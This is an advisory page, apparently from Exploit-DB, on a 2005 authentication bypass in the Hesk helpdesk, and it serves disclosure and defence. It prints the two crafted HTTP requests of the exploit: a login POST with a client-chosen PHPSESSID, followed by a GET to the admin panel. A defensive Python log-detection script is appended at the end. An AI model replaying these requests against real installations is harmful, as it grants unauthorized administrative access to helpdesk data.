Vendor: Hesk
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Authentication Bypass
CWE: 287
Product Name: Hesk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
2005

Hesk Authentication Bypass Vulnerability

Hesk is prone to an authentication bypass vulnerability. Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks. An attacker can exploit this issue by sending a specially crafted HTTP POST request with a randomly chosen Session ID, followed by a GET request to the administrative control panel.

Mitigation:

Upgrade to the latest version of Hesk.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14879/info

Hesk is prone to an authentication bypass vulnerability.

Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks. 

1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/hesk/admin.php
Cookie: PHPSESSID=12345 <!-- Random Session ID--!>
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");

2. GET request to administrative control panel:
GET admin_main.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345") <!-- Session ID --!>
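
One way to detect the two-request sequence above in server logs, as an added example that is not part of the original advisory or of Hesk: it flags administrative-panel pages served to a PHPSESSID the server never issued in a Set-Cookie header. The log format, field order, status codes and sample lines are constructed assumptions, and the function name is hypothetical; the check only applies where request and response session IDs are logged.

```python
# Added example. Constructed log format (not a Hesk or web-server default):
# time client method path status request_PHPSESSID Set-Cookie_PHPSESSID
# "-" means the field was absent. All lines and status codes are sample data.
SAMPLE_LOG = """\
10:00:01 198.51.100.7 GET /hesk/admin.php 200 - a1f3c9
10:00:09 198.51.100.7 POST /hesk/admin.php 302 a1f3c9 -
10:00:10 198.51.100.7 GET /hesk/admin_main.php 200 a1f3c9 -
10:05:30 203.0.113.9 POST /hesk/admin.php 200 12345 -
10:05:31 203.0.113.9 GET /hesk/admin_main.php 200 12345 -
10:07:00 203.0.113.44 GET /hesk/admin_main.php 302 zzz999 -
"""


def find_unissued_admin_sessions(log_text, login="admin.php", panel="admin_main.php"):
    """Return alerts for panel pages served to session IDs the server never issued."""
    issued = set()    # session IDs handed out by the server via Set-Cookie
    login_posts = {}  # unissued session ID -> time it was first POSTed to the login script
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # ignore malformed lines
        ts, client, method, path, status, req_sid, set_sid = fields
        if set_sid != "-":
            issued.add(set_sid)
        if req_sid == "-" or req_sid in issued:
            continue  # no cookie, or a server-issued session: normal traffic
        script = path.split("?", 1)[0].rsplit("/", 1)[-1]
        if method == "POST" and script == login:
            login_posts.setdefault(req_sid, ts)
        elif script == panel and status == "200":
            # Panel content returned for a client-chosen session ID.
            alerts.append({
                "time": ts,
                "client": client,
                "session_id": req_sid,
                "preceding_login_post": login_posts.get(req_sid),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_unissued_admin_sessions(SAMPLE_LOG):
        print(alert)
```

Sessions issued before the start of the analysed log window will look unissued, so begin at a point where no earlier sessions are still valid or pre-load the `issued` set from the session store.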